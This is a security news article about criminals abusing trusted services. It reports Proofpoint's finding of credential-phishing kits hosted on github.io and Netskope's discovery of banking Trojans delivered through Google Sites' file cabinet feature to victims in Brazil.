Cybercriminals will host their attack infrastructure anywhere, even on GitHub code-sharing repositories.
Researchers from Proofpoint found that cybercriminals have been hosting phishing sites on GitHub’s free code repositories since at least mid-2017. The kits do not use typical hosted PHP methods because the GitHub’s github.io platform does not provide PHP back-end services. The phishing landing page was modified to use a PHP script hosted on a remote domain and not one local to the kit.
While all of the identified GitHub accounts hosting phishing material have been taken down as of April 19, enterprise defenders should be aware of potential malicious sites using the canonical $github_username.github.io domains.
“Sending stolen credentials to another compromised website appears to be commonplace for all the active phishing kits we have observed on github.io,” the researchers wrote.
The HTML code to send credentials in a HTTP POST request to another site was lightly encoded to obfuscate its original purpose, the researchers said. In some cases, the github.io domain was used as a way to redirect users to the actual malicious site. This way, the criminals could ensure the actual phishing page remained active longer.
Criminals have previously abused legitimate cloud storage sites, social networking sites, and commerce services to host their attacks. “Microsoft’s free accounts on the GitHub service, which have typically been used for Open Source and other public software development repositories, are equally vulnerable to widespread abuse,” Proofpoint said.
Abuse Trusted Sites
Cybercriminals have a history of using free web services such as Dropbox, Google Drive, Paypal, Ebay, and Facebook to host their attack campaigns. Recently, researchers from Netskope Threat Research Labs uncovered a group using the file cabinet template in Google Sites to deliver banking Trojans to Portugese-speaking victims based in Brazil. Netskope noticed the attack earlier this month.
“Our Terms of Service prohibit the spreading of malicious content on our services, and we proactively scan Google Sites attachments for abusive or malicious content. In addition, we offer security protections for users by warning them of known malicious URLs through Google Chrome's Safe Browsing filters,” a Google spokesperson said.
Google File Cabinet lets users upload files to be hosted onto a Google Sites page, so criminals were using the feature to upload malware and including the links in phishing emails. When victims click on the links—which show up as Google URLs in the email—they are taken to the malicious website and hit with a drive-by-download attack. While Google blocks malicious file uploads in many of its services, such as Gmail, that doesn’t seem to be the case with Google File Cabinet.
“Users place an implicit trust to vendors like Google. As a result, they are more likely to fall victim to an attack launched from within a Google service,” wrote Ashwin Vamshi, a security researcher at Netskope.
Using trusted services such as Google, Office 365, Dropbox, and in some cases GitHub, lets criminals avoid filters and scanners that block malicious attachments from reaching victim inboxes. Criminals are also banking on the possibility that even users who may have been trained to avoid attachments may still click on links—especially if it is to a site or service they recognize.